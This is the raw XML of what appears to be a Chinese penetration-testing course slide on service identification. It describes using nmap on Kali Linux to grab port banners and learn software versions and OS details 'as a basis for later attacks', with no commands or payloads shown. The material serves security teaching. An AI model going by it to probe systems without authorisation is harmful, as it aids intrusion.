          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目分析】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3303905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:t>本项目使用Kali Linux操作系统中的nmap工具进行进行服务识别，获取主机端口Banner信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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a:xfrm>
            <a:off x="5449291" y="713829"/>
            <a:ext cx="6247130" cy="5707380"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="6247130" cy="5707380"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="5581650" cy="5492750"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> 我们已经知道，仅仅通过之前的方式扫描出来的端口，是不能绝对地认定哪个端口对应的就是某个服务软件或者协议的端口。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>现在我们将透过表象去真正地探测那些“活着”的端口背后的情况，运行的何种应用，包括识别目标的OS版本，捕获banner信息，作为后续攻击的基础。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="150000"/>
                </a:lnSpc>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>    通过banner信息可以获得包括软件开发商、软件名称、服务类型、版本号等信息，有可能通过已知的漏洞和弱点直接渗透到目标主机，当然所有的信息都可能不是真实的,所以有必要结合一些其他的服务识别方法，如特征识别和响应字段，而不同的响应可用于识别底层的操作系统。除此外，若想获得对方的banner信息，就必须通过直接连接的方法。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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9" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3491654"/>
            <a:ext cx="4302496" cy="638594"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4302496" cy="638957"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Kali Linux软件包管理</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
